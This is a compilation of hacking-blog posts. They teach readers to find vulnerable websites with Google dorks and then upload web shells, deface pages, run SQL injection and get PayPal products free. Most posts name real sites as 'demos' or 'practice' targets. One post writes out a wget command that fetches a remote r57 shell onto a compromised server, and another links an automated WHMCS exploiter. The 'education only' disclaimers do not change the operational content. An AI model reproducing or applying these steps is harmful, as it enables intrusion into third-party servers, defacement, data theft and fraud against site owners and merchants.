Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP: Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....

Israel Private 0Day Shell Upload Exploits ASP|PHP

1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-

'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp

# DEMO SHELL -|- 
http://littlebags.co.il/banners/1dea62aa_bddf_4e3d_8464_f640f62ac8c7.asp

Israel Private 0Day Shell Upload Exploits ASP|PHP

2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php

‪#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

Israel Private 0Day Shell Upload Exploits ASP|PHP

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin

# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So thats it guys we have seen  Israel Private 0Day Shell Upload Exploits ASP|PHP shre it :)

Read more

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully Hacked into Joomla Admin Panel? Not sure how to upload shell in jooma via admin panel? well your are at right place because today we are talking about How To Upload Shell in Joomla Via Admin Panel. Today I'm going t teach you How To Upload Shell in Joomla Via Admin Panel. Its pretty simple! just follow the following steps given below  :) :-

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have an access to joomla admin. Now just login into it..

Once you Login you see the below screen.

Then look for Extensions and in that Template Manager.

Once you click on that you will see all the templates installed on that site.

See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it did beez in green.

Once you click on beez you will see the following screen. now just click on edit html

Once you click on edit html you will see the following screen

see the red part /templates/beez/index.php that is the path of your shell

Now just paste your shell code over their and save it

Once you click on save. it will take you to page were it will show you Template source saved. you work is done..

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php

Read more

Chiangraientersoft HTML Injection Vulnerability

Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-

inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title

2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :

 /webboard/Qform.php
 /board/Qform.php

3). Just fill-up the forum and upload your deface page shell etc..

After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/

Read more

Bypass Disabled Upload Option And Upload Shell

Bypass Disabled Upload Option And Upload ShellHello Readers! since I got many messages from people asking that they were facing many problems in shell uploading. So I have decided to write about this. Its just an example for shell uploading..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Find a vulnerable sites that has Disable Upload Option. Example

http://centralplaza.co.th/chiangrai/photoupload.asp

You can also use google dork for finding more:-

inurl:/photoupload.asp

2). Now right click on the page and click on Inspect Element and find the code for that upload button to enable to disabled upload button :P

3). Now Change the text disabled="disabled" to enabled="enabled" and press Enter..

Do the same for SUBMIT button and finally upload your shell.php.jpg ..

4). Now to find you uploaded shell simple click on View All Photos .. an get you Shell :)

Enjoy..!!

Read more

WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters

Hello Readers! Today Im going to share a wonderfull toll made by g00n Team Xploiters. Its WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters [PHP] ...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

So Here It Is:-

Here is the PHP code of this WHMCS Auto Exploiter (0day) 5.2.8:-

↓↓      ↓↓

Www.pastebin.com/cuikqkhA

Note:- You must save it as WHMCS Auto Exploiter.php

So in this you just have to do is crack the Hashes. In some cases just Google the hash and you will get the password. Then just log in to WHMCS ...

Scanned results will saved in a text file: WMCS-Hashes.txt

Screen Shots:-

Read more

How to Hack A Targeted Server Or A Website

Hello Readers! Today I am going to teach you how you guys can target a server and find a vulnerability and hack into..  How to Hack A Targeted Server Or A Website or How to Inject Shell in a Targeted Server or A website or How to Target a Website Or Server...This is not much easy but I will try to explain...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Get I.P. Address

First step is to get a I.P. address of a Website or a Server which you wanna hack. So for this we have to ping our target. To do this..

• Go to start
• Open CMD
• and type :-

ping www.yourtarget.com

So, now you have Ip Address of your Target..

See the following Image as an Example :-

2). Search for Websites hosted on Targeted Server.

Now our second Step is to search for vulnerabilities in your targeted server or a website..So for this you have to do is:-

• Go to www.bing.com
• And in the search box type:-

ip:[targets I.P server]

Example:- ip:74.145.128.97

Now by doing this will Display all the websites hosted on your targeted server..

3). Search for vulnerabilities..

Now third step is to search for vulnerabilities..So for this you can use normal dorks such as .php?id= for SQL Injection Vulnerable websites or you can also try any other exploit. Example:-

ip:74.145.128.97 .php?id=

Now try to find a injectable hole or vulnerability in And hack into the Server or A website. That's it :)

You can do the same if you have other bugs for joomla and other scripts. This method might be old, but its still works as gold. I hope it helps..

Enjoy..!!

Read more

Simple Upload 53 Shell Upload Vulnerability

This Vulnerability allows Hacker to upload Shell. Web Application vulnerability in"Simple Upload 53" PHP file allows an attacker to upload Backdoor shell code in your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.

inurl:simple-upload-53.php

2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.

3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:

http://www.site.com/files/[Your File]

After uploading the shell , You can hack/deface the site.

Read more

WebTester File Upload Vulnerability

Hello Reader,Hope you all are enjoying my posts.. here Im back with new file upload vulnerability..

called WebTester File Upload Vulnerability . SO lets start..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..

Google Dork : inurl:go.php?testID= 

For More Results Use your Brain and create your own Dork..

Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

2). Now, upload your html , txt or jpg files

3). To find you uploaded file :-

 http://target/path/test-images/[yourfile].html

Enjoy...

Read more

Hack Web Sites Using IIS Exploit [For XP Users]

Hello Readers, I heard some of you are not getting out tutorials because u have no knowledge about Web hacking and you wanna learn web hacking .. So today i decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about IIS Web Hacking Exploit the Easiest way to hack for Noobs..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this Exploit an attacker can upload shell , Deface web site delete data etc. etc can do every thing without login..:D . Yeah you heard Right.. I know you all are getting exited, So lets's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork be Creative use mind and create your own unique dork :) ..

If you are unable to find Don't worry ..See the end of the tutorial i have posted some sites :)

2). After Finding Vuln Site .Click on Start button And open "RUN"

3). Now type the following code in "RUN"

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a FOlder will open named "Web Folders"

Now Right Click in that folder then "New" And then  "Web Folder"..

5). Now paste the url of the Vulnerable site And CLick Next..

6). Now it will ask you to give Name for that Web Folder leave as it is Click Finish..

7). Congratulations! Now you are in the web site..If you wanna upload shell copy your Shell.php in to that folder and your shell will be uploded.. to path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  
http://www.houtai123.cn/
http://news.rhvacnet.com/
http://israelshamir.net/
http://intellectual.members.easyspace.com/
http://hoodstarsports.com/
http://jennylo.co.uk/
http://hurrelvisualarts.com/

Soon i will post list of Vuln. sites of IIS Exploit/....

Read more

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a Kind of FCK Editor Remote file upload Vulnerability..
In this Vulnerability Hacker can upload a shell. deface page or any file on website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork

Google Dork :"Portail Dokeos 1.8.5"

2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here..

To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html

Read more

Encodable Shell File upload Vulnerablity

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork

Dork: "intext:File Upload by Encodable"

Result comes with 166,000 results.. but some results are fake ... its may be malwares
So pick real things only , "Upload a file" You will this title in search results here :)
Click the sites only which comes with upload a file title..

2). After click the link you'll got a upload form...

3). You'll see some options in this form like name Description email etc ...
type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc :P

4). Now choose you file and upload it :)

5). After clicking on upload button a pop up will be open ... dont close it, it will automatically closed
after uploading file.

6). In some sites you'll get your uploaded file link after uploading on website
and if you did not file it then try these url

/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi

Read more

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 

- pma & mysql db privileges. 

Follow the Instructions:-

1). First login in to mysql. Or you can use these dorks also CLICK HERE.

2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 

3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!

Read more

PhpmyAdmin Exploit with Google Dorks

Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.

Dork: allinurl:index.php?db=information_schema

2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...

Read more

0Day Smokybyte SQL Injection Vulnerability 2016

[~] Exploit Title: Smokybyte SQL Injection Vulnerability
[~] Google Dork: intext:"Site by Smokybyte"
[~] Date: 08/04/2014
[~] Exploit Author: Tw-Root [ RedKit ]
[~] Tested on: Windows 7 and 8

Updated! 2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

[+] SQLi Exploit : Http://WebSite.Com/[path]/***.php?id=[SQLi]

[+] Demo : http://www.gcircuit.com/gallery-de.php?id=[SQLi]

Order Demos : 

http://www.kantanamotionpictures.com/equ...hp?ic=%271
http://www.bigbluethai.com/popup_clients.php?ic=%2714
http://www.engcorp.co.th/newsDetail.asp?NewsID=%2712
http://www.bangkoksculpturecenter.org/ne...278&Page=1
http://www.pisutshop.com/webboard_detail...ID=%272671
http://www.941hotel.com/newsAndEvent_De.php?id=%274
http://www.satirathai.com/collection.php?ic=%273
http://mscsittipol.com/helpDesk_Cate.php?q=%272

Read more

HACK Website with RTE Webwiz Vulnerability | File Shell upload

HACK Website with RTE Webwiz Vulnerability | File Shell upload:Guyz again I'm here with new WEB VULNERABLITY called HACK Website with RTE Webwiz Vulnerability | File Shell upload.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .So Lets start..

Follow The Instructions:-

1). Expolits:-

• site.com/rte/RTE_popup_file_atch.asp 
• site.com/admin/RTE_popup_file_atch.asp

2). Go to google and type one of the following dorks.

• inurl:rte/my_documents/my_files
• inurl:/my_documents/my_files/ 

3). Open any site ..say

site.com/rte/my_documents/my_files/

4). Now replace every thing after site.com with

 rte/RTE_popup_file_atch.asp 

so it will look like-

site.com/rte/RTE_popup_file_atch.asp 

5). Open it and upload you Shell or deface

6). Now click on upload button and after that you will get path to your uploded file in the FILE URL box

Happy hacking.. Only for Educational Purposes..!

Read more

Spaw Shell Upload Vulnerablity

Spaw Shell Upload Vulnerablity:Hello Friends, today I'm going to share another Shell upload Vulnerablity with you all called Spaw Shell Upload Vulnerablity.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)

  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"

2). You will get lots of results. Open any site..

For Example i got :- example.com/spaw2/dialogs/

3). Now replace spaw2/dialogs/ with

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

  So now our url will look like this :-

example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

4). Now open the site and it will look like this->

5). Now upload your deface page.. :)

Happy Hacking..ONly for educational Purposes..

Tags:

• Spaw Shell Upload Vulnerablity
• how to upload shell
• how to hack websites
• defacepage
• deface website
• free shell
• shell upload vulnerablity

Read more

Paypal Javascript Exploit - Get Products Free

In this Tutorial we are talking about Paypal Javascript  Exploit. So Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .

So lets start..! ;)

Follow The Instructions:-

1). Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter !!.

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

2). So after you have hit enter, just sit back & enjoy the free product .

Live Demo :-
Vulnerable Site  - http://www.orderproductsdirect.com/Instantdownload.htm

3). So after you paste the JavaScript in the URL then the product will be automatically downloaded :)

More Vulnerable sites link -

 Click Here  (some sites are patched)

&

Password 

Enjoy...!!

Read more

Testing Image Shell and Deface Upload Vulnerability

In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:

1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any Website from the search result.Find the upload option. in the bottom left corner..

4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!

Read more

File Thingie Shell Upload Exploit Vulnerablity

This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)

Google Dork : inurl:ft2.php intext:upload

2). After the searching the above dork, you will get websites vulnerable to this. 

3). Select any website, upload your deface or shell there.

4). To view your deface or shell, just click on your file name after its uploaded.

Happy Hacking .ONly for Educational Purposes ..!!!!!

File Thingie Shell Upload Exploit Vulnerablity
File Thingie Shell Upload
File Thingie Exploit

Read more